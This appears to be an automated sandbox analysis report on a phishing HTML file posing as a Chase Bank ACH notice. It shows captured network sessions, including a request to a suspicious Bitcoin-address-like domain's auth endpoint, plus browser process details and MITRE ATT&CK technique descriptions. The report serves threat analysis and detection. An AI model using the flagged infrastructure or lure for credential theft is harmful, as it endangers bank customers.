333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	23.204.76.112	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 16:00:11 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-26 16:00:11 UTC	530	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0DZ+oYgAAAABSxwJpMgMuSLkfS640ajfFQVRBRURHRTEyMTkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=54208 Date: Fri, 26 Apr 2024 16:00:11 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-26 16:00:11 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49753	185.216.70.6	443	5316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 16:00:13 UTC	366	OUT	GET /api/v3/auth HTTP/1.1 Host: bc1qusz5l7h87pd2v6sv45nz82s.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 16:00:13 UTC	173	IN	HTTP/1.1 405 Method Not Allowed date: Fri, 26 Apr 2024 16:00:13 GMT server: uvicorn allow: POST content-length: 31 content-type: application/json Connection: close
2024-04-26 16:00:14 UTC	31	IN	Data Raw: 7b 22 64 65 74 61 69 6c 22 3a 22 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 22 7d Data Ascii: {"detail":"Method Not Allowed"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49755	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 16:00:17 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=owbwle7rzO8EAgc&MD=rXp+yGxZ HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-26 16:00:18 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: ca9f689d-7046-495a-b0de-3cc1e0a2ce70 MS-RequestId: 2035fa11-4073-44bc-9f75-6772b2101a1f MS-CV: rpF4N5XKo0qhQjoN.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Apr 2024 16:00:17 GMT Connection: close Content-Length: 24490
2024-04-26 16:00:18 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-26 16:00:18 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49764	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 16:00:56 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=owbwle7rzO8EAgc&MD=rXp+yGxZ HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-26 16:00:56 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 56db1f8e-0d77-4d12-a31a-92a458608896 MS-RequestId: 157eb0c8-9e62-49fb-b74a-94a95190962a MS-CV: DxmjogyrF0qeWm9+.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Apr 2024 16:00:55 GMT Connection: close Content-Length: 25457
2024-04-26 16:00:56 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-26 16:00:56 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Target ID:	0
Start time:	17:59:50
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Housecallpro Chase Bank ACH.htm"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	17:59:56
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2036,i,10491020609356299719,17026791416098519770,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	17:59:57
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:59:57
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1940,i,14694226768755553256,8904102379768142272,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Housecallpro Chase Bank ACH.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 4416, Parent PID: 6048

General

Chronological Activities

Analysis Process: chrome.exePID: 5316, Parent PID: 4416

General

Chronological Activities

Analysis Process: chrome.exePID: 6356, Parent PID: 5076

General

Chronological Activities

Windows Analysis Report
Housecallpro Chase Bank ACH.htm